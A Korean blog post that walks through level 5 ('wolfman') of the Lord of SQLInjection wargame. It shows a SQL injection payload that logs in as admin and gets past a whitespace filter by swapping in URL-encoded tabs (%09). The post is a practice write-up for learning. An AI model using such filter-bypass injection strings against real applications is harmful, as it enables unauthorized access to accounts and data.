e_yejun
Jun_ : Pwn
e_yejun
전체 방문자
오늘
어제
  • 분류 전체보기 (240)
    • Profile (1)
    • Pwnable (54)
    • Reversing (14)
    • Network (7)
    • Forensic (10)
    • Embedded (4)
    • Android (2)
    • Web (18)
    • 알고리즘 (42)
    • 프로그래밍 (24)
    • 프로젝트 (6)
    • 1-day (7)
    • CTF (15)
    • 기타 (33)
    • 일기장 (0)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • rev-basic
  • X86
  • Heap
  • 1-day
  • dreamhack.io
  • how2heap
  • dvwa
  • BOF
  • wargame
  • x64

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
e_yejun

Jun_ : Pwn

Web

[LOS] Level5 wolfman 풀이

2023. 4. 15. 23:12
Lord of SQLInjection
https://los.rubiya.kr/

Level5 : wolfman

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

pw 파라미터의 값에 공백이 막혀있다.

?pw=' or id='admin'%23

공백 대신 tab을 이용해서 공백처럼 사용할 수 있다. tab의 url 인코딩 값은 %09이다.

?pw='%09or%09id='admin'%23


Uploaded by N2T

    'Web' 카테고리의 다른 글
    • [DVWA] CSRF 문제풀이
    • [Webgoat] XSS 문제풀이
    • [LOS] Level4 orc 풀이
    • [DVWA] XSS 문제풀이
    e_yejun
    e_yejun
    정리노트 •_•

    티스토리툴바